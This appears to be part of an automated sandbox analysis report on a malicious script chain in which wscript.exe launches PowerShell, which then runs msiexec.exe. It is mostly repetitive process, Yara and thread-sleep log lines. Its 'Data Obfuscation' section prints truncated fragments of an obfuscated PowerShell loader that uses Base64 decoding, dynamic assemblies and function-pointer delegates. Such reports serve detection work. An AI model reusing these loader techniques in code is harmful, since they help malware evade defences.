              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000005.00000002.1714023781.0000000006DD5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbe source: powershell.exe, 00000005.00000002.1721313369.0000000007F34000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtni", "0")
              Source: Yara match File source: 00000005.00000002.1723278711.00000000089D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.1722877673.0000000008160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Lophiostomous)$gloBal:KOLERa = [SystEM.texT.EnCODING]::asCii.GetsTRiNg($SAbler)$gLoBal:dOmkaPELLers=$KoLErA.suBStRiNg($leviStICUm,$paRAgRaffEr)<#Carcanetted Begad Urochordate Conines
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((ladron $Majolist $beridere), (Inflood @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vandrerne = [AppDomain]::CurrentDomain.GetAssemblies()$global:Smiling
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skumplendes)), $Mozzettas).DefineDynamicModule($Prespreading73, $false).DefineType($Helioid, $langrels, [System.MulticastDelegate])$Pr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Lophiostomous)$gloBal:KOLERa = [SystEM.texT.EnCODING]::asCii.GetsTRiNg($SAbler)$gLoBal:dOmkaPELLers=$KoLErA.suBStRiNg($leviStICUm,$paRAgRaffEr)<#Carcanetted Begad Urochordate Conines
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF7BFED00BD pushad ; iretd 2_2_00007FF7BFED00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF7BFED0952 push E95B7CD0h; ret 2_2_00007FF7BFED09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF7BFFA704A pushad ; iretd 2_2_00007FF7BFFA704B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_029EC898 pushfd ; ret 5_2_029EC899
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C182E push edi; retf 5_2_088C186D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C2B1C push ss; ret 5_2_088C2B1D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C3B34 pushad ; retf 5_2_088C3B35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C0C25 push es; ret 5_2_088C0C35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C0F2D push esp; iretd 5_2_088C0F34
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_088C4196 push eax; retf 5_2_088C41A0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_04260C25 push es; ret 7_2_04260C35
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_04260F2D push esp; iretd 7_2_04260F34
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0426182E push edi; retf 7_2_0426186D
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_04264196 push eax; retf 7_2_042641A0
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_04263B34 pushad ; retf 7_2_04263B35
              Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_04262B1C push ss; ret 7_2_04262B1D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599669
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599453
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599343
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599228
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599125
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599015
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598794
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598687
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598468
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598357
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598248
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598140
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598031
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597921
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597812
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597700
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597593
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597484
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597374
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597265
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597156
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597046
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596937
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596828
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596718
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596608
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596500
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596384
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596281
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596171
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596062
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595941
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595828
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595718
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595606
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595499
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595390
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595253
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595132
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595031
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594917
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594812
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594703
              Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594593
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4824
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5059
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5952
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3866
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -26747778906878833s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 760 Thread sleep count: 3386 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599890s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599781s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599669s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 760 Thread sleep count: 6463 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599562s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599453s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599343s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599228s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599125s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -599015s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598906s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598794s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598687s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598578s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598468s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598357s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598248s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598140s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -598031s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597921s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597812s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597700s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597593s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597484s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597374s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597265s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597156s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -597046s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596937s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596828s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596718s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596608s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596500s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596384s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596281s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596171s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -596062s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595941s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595828s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595718s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595606s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595499s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595390s >= -30000s
